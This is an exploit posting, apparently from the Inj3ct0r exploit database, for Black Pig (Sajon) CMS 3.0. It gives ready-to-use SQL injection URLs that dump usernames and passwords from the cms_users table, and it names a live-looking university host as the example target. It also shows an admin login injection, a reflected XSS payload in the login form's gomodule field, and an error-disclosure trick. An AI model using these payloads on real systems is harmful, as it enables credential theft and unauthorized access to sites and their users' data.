============================================= Black Pig (Sajon) CMS 3.0 SQL Injection + XSS ============================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com #[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net Product : Black Pig (Sajon) CMS 3.0 site: http://www.blackpig.co.uk/ Investigated the University of Cambridge. =] The file name may change, but is vulnerable parameter key 1) SQL inj3ct0r Example: http://www.enterprise.cam.ac.uk/archive.php?key=-24+union+select+username,2,password+from+cms_users-- http://www.enterprise.cam.ac.uk/archive.php?key=-24+union+select+version(),2,concat_ws(char(58),group_concat(username+separator+0x3a),group_concat(password+separator+0x3a))+from+cms_users-- SQL inj in admin, when authorization Example: POST formloginuser=%00 2) XSS http://www.site.com/cms/admin.php POST action=login&gomodule=>">alert(KU-KU,7750312847)%3B The same is true in goid,gopage Admin is: site.com/cms/ Disclosure ways: http://www.site.com/cms/admin.php in the login box set ' Table: cms_users Fields: username,password ThE End =] Visit my proj3ct : http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net # ~ - [ [ : Inj3ct0r : ] ]